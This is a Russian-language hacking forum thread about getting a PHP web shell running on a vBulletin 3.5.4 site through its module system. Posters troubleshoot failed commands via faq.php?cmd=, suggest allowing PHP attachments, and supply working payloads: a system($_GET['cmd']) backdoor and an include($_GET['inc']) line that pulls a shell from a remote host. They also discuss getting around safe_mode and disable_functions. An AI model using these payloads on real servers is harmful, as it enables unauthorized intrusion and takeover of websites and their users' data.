Ни самописный шелл, ни вообще любой другой через модули (как написано в теме про уязвимости vBulletin) не работает. заходишь на faq.php?cmd=ls например, а там фигня полная. поиск и всё. через смайлы тоже не канает.
дело не в патче,а в неправильном использовании скрипта... если ты в модуль зафигачил шел,то он будет работать 100% (при условии что ты правльно даешь команду) в версии 3.5.4
не, там фряха! =) а использую правильно, че вы думаете я шелл не могу заюзать?? =) я ещё помню времена php-including =)
лабо пропачено, либо ты что то не так сделал. еще раз все проверь. один раз было такое, что вот так не сработало faq.php?cmd=ls -al пришлось прямо в модуль вставлять код, попробуй. но при выполнении следующей команды надо переписывать модуль. ТАк что сразу заливай шелл.
неее я сам хочу как думаете если к вложениям добавить пхп, а потом куда-нить вложить шелл будет работать??
топикстатрет а ты вобще подумал о том что там может стоять сейфмод или в дисабле_функ зафигачено все ехечные функции?
посмотри phpinfo(); если отключены функции выполнении команд, то юзай php Например вывод всех файлов в каталоге:
попробуй вместо PHP: <? system($_GET['cmd']) ?> вбить PHP: <? include($_GET['inc']) ?> и проинклудь нормальный шелл... faq.php?inc=http://site.ru/shell.php, где http://site.ru/shell.php - ссылка на твой шелл
disable_functions system, shell_exec, exec, proc_get_status, proc_nice, proc_terminate, define_syslog_variables, syslog, openlog, closelog, escapeshellcmd, passthru, readfile, ocinumcols, ini_alter, leak, listen, chgrp, set_time_limit, apache_note, apache_setenv, debugger_on, debugger_off, ftp_exec, dl, dll, ftp
